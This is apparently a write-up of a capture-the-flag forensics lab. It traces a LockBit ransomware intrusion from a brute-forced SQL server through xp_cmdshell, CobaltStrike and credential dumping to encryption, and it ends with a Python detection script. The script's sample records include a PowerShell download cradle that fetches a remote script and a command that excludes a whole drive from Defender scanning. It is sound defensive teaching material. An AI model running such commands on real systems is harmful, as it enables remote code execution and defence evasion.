Tate | Security+ | CDSA | CCD

LockBit

Scenario:

A medium-sized corporation has experienced a ransomware attack, first identified when a user reported a ransom note on their screen alongside a Windows Defender alert indicating malicious activity. Your task is to analyze logs provided from the compromised machines and identify the ransomware’s entry point.

Walkthrough & Analysis

Looking at Microsoft Protection Logs (MPlog.txt)


Starting with the Domain Controller (DC01), I examine the Defender logs to identify any flagged activities on this system.

A suspicious executable file in the ADMIN$ share on the Domain Controller raises immediate concern.


MPLogs, or “Microsoft Protection” logs, are generated by Defender or MS Security Essentials. They provide a good initial overview of potential threats on the system.

In the log, the suspected CobaltStrike executable adds a path to the exclusions list, instructing Defender to skip scanning the entire “C:\” drive for malicious activity.


Comparing these two event logs reveals communication between two internal IPs (the DC and another machine) through unusual port numbers just before the malicious software installation.

To confirm 192.168.170.142 as the IP address of the Domain Controller, we examine the SYSTEM root hive of the DC01 triage image.

Using Registry Explorer to Locate DC01’s Assigned IP


This IP address is confirmed as the only one assigned to the DC01 system.

I could spend all day snooping around in this KAPE image. Instead of getting tunnel vision, I will pivot to analyzing the SQL server to better understand the attack’s scope, starting again with the Defender logs.

Analyzing MPlogs on SQL Server


Defender has detected and blocked cmd.exe from executing commands, warranting further investigation.

Examining Windows (Sysmon) Event Logs


We observe the same Process ID (PID) being spawned from the sqlservr executable in the Program Files directory. This cmd.exe process uses PowerShell to download a payload script from a remote IP address.

So far, we have confirmed two infections, but how did the attacker gain access to the SQL server? Luckily, in our KAPE data, we have MSSQL error logs, which can provide us with valuable insight into the server’s activity during this timeframe.


These logs reveal that the attacker brute-forced their way into the SQL server and subsequently enabled the “xp_cmdshell” feature, allowing remote command execution.

Returning to the Sysmon logs, our attack timeline becomes clearer. After enabling xp_cmdshell, PowerShell executes a sequence of commands:

  1. Uses “IEX (New-Object Net.WebClient).DownloadString” to download a PowerShell script from a remote host.
  2. Injects into winlogon.exe [PID 596] -> Creates Remote Pipe to \postex_c352 (CobaltStrike Post Exploitation Framework).
  3. Executes encoded PowerShell payloads in memory.
  4. Dumps lsass.exe process and extracts credentials.


We notice a familiar pattern: the payload creates a Defender exclusion for the folder path “C:\” on both FileServer and DevPC.


First, on FileServer, we see a malicious executable blocked by Defender.

Now to look at DevPC…


The 32-bit version of Rundll32.exe creating vmware.exe in the Temp folder is highly suspicious and warrants investigation.


Since I have VMware installed locally, I decided to double-check. As I expected, the default path for the vmware executable is in either Program Files or Program Files (x86).


Ransomware Execution

The malicious executable creates a README.txt file in the Downloads folder and subsequently overwrites every file in the C:\ drive, indicating a successful ransomware attack.

Conclusion

This analysis reveals a sophisticated ransomware attack involving multiple stages:

  1. Initial compromise of the SQL server through brute-force attacks.
  2. Utilization of SQL server features for command execution.
  3. Lateral movement to other systems using domain shares (such as ADMIN$).
  4. Deployment and execution of the LockBit ransomware.
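As an added example (not part of the original writeup), the following triage script encodes the four process-creation patterns the timeline above turned on, sqlservr.exe spawning cmd.exe after xp_cmdshell, the IEX/DownloadString cradle, a Defender exclusion for a whole drive, and 32-bit rundll32 launching an executable from Temp, and runs them over constructed Sysmon-style records. The field names, host names, paths and the 203.0.113.5 address are assumptions, and the exclusion rule assumes the exclusion was added with the Add-MpPreference cmdlet.

```python
import re

# Constructed records resembling Sysmon Event ID 1 (process creation) fields.
# Hosts, paths and the 203.0.113.5 address are assumed sample values modelled on
# the writeup's findings, not values taken from the challenge logs.
SAMPLE_EVENTS = [
    {"host": "SQLServer",
     "parent_image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c powershell IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"},
    {"host": "FileServer",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe Add-MpPreference -ExclusionPath 'C:\'"},
    {"host": "DevPC",
     "parent_image": r"C:\Windows\SysWOW64\rundll32.exe",
     "image": r"C:\Users\dev\AppData\Local\Temp\vmware.exe",
     "command_line": r"C:\Users\dev\AppData\Local\Temp\vmware.exe"},
    {"host": "DevPC",  # legitimate VMware launch from Program Files: must not fire
     "parent_image": r"C:\Program Files (x86)\VMware\VMware Workstation\vmware.exe",
     "image": r"C:\Program Files (x86)\VMware\VMware Workstation\x64\vmware-vmx.exe",
     "command_line": r"vmware-vmx.exe"},
]

def _ends(path, suffix):
    # Case-insensitive suffix match on a Windows path.
    return path.lower().endswith(suffix.lower())

# Each rule mirrors one finding from the investigation timeline.
RULES = {
    "sqlservr.exe spawning cmd.exe (xp_cmdshell)":
        lambda e: _ends(e["parent_image"], r"\sqlservr.exe") and _ends(e["image"], r"\cmd.exe"),
    "PowerShell download cradle":
        lambda e: re.search(r"IEX\s*\(\s*New-Object\s+Net\.WebClient\s*\)\s*\.DownloadString",
                            e["command_line"], re.I) is not None,
    "Defender exclusion covering a whole drive":
        lambda e: re.search(r"Add-MpPreference\b.*-ExclusionPath\s+['\"]?[A-Za-z]:\\['\"]?(\s|$)",
                            e["command_line"], re.I) is not None,
    "32-bit rundll32 launching an executable from Temp":
        lambda e: _ends(e["parent_image"], r"\SysWOW64\rundll32.exe")
                  and re.search(r"\\temp\\[^\\]+\.exe$", e["image"], re.I) is not None,
}

def triage(events):
    """Return (host, rule name, command line) for every event that matches a rule."""
    return [(e["host"], name, e["command_line"])
            for e in events for name, match in RULES.items() if match(e)]
```

Running triage(SAMPLE_EVENTS) yields one hit per compromised host plus a second on the SQL server for the cradle, and nothing for the legitimate VMware launch.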

Takeaways

You probably can’t tell from how concise this writeup is, but I actually spent a decent amount of time on this challenge, more than I should’ve. One thing I am learning as an analyst is to recognize when I’m starting to get tunnel vision and to remain focused on the bigger picture. With proper context, I’m able to navigate and replicate the attacker’s moves more efficiently.